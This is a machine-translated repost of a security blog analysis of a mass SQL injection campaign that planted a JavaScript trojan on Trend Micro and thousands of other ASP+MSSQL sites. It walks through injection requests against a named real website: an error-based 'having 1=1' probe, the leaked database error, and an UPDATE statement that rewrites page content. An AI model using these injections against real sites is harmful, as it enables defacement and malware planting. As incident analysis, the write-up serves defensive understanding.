Analysis of attacks on tens of thousands of websites, such as Trend Micro

Source: Internet
Author: User
Tags sql server driver odbc sql server driver sql injection attack
BY: rayh4c.cn 1. first found the attack on the Internet news report http://www.2cto.com/200803/24504.htmlhttp://www.nsfocus.net/news/6697http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a

BY: rayh4c.cn

I. I first found the news and reports of this attack on the Internet

Http://www.2cto.com/ OS /200803/24504.html

Http://www.nsfocus.net/news/6697

Http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

You can search for related hacked pages through GOOGLE.

Http://www.google.cn/search? Hl = zh-CN & q = site % 3Atrendmicro.com ++ www.2117966.net + fuckjp. js & btnG = Google + % E6 % 90% 9C % E7 % B4 % A2 & meta = & aq = f

The Trend Micro page is inserted with a Trojan horse related to http://www.2117966.net/fuckjp.js.

2. directly search for JS-related information

Http://www.google.cn/search? Complete = 1 & hl = zh-CN & newwindow = 1 & q = www.2117966.net + fuckjp. js & meta = & aq = f

12,500 matching results were found. the returned results are all JavaScript Trojans inserted on the current page.

Analysis shows that the hacked pages have the following features:

1. the websites on the modified pages are all ASP + MSSQL architectures.

2. the SQL injection vulnerability exists on the modified pages.

3. take one of the infected Trojan pages and launch a simulated SQL injection attack:

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162

This link has obvious SQL injection. for the person parameter injection statement having 1 = 1, the table name of the injection point on the current page is coordinator and the field name is exposed.
ShCoordinatorSurame.

Http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162
Having 1 = 1

------------------
Microsoft ole db Provider for ODBC Drivers error 80040e14 ′
[Microsoft] [odbc SQL Server Driver] [SQL Server] Column
Coordinator. ShCoordinatorSurame is invalid in the select list
Because it is not contained in an aggregate function and there is no
Group by clause.
/Wisard/shared/asp/Generalpersoninfo/StrPersonOverview. asp, line 20
-------------------

2. modify the name of the exposed table on the current page. the content of the field name is the JavaScript code inserted to implement Trojan Horse mounting.

Http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162; update
Coordinator set ShCoordinatorSurame = Where 1 = 1 --

Modify the content of the ShCoordinatorSurame field in the coordinator table And set 1 = 1 to true logical conditions to modify the current page.
Query the data content.

You can directly mount a Trojan on a page with an SQL injection point.

IV. Summary.

The process of this large-scale attack should be automated:

1. collect SQL injection vulnerabilities on tens of thousands of websites in batches using advanced scanning technology.

2. Automated SQL injection and Trojan Horse mounting for vulnerability attacks.

Today, although the SQL injection vulnerability is very old, the hacker's technology of simultaneously attacking and mounting Trojans on the HiChina website within one day is amazing, and even security companies like the trend are not spared.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.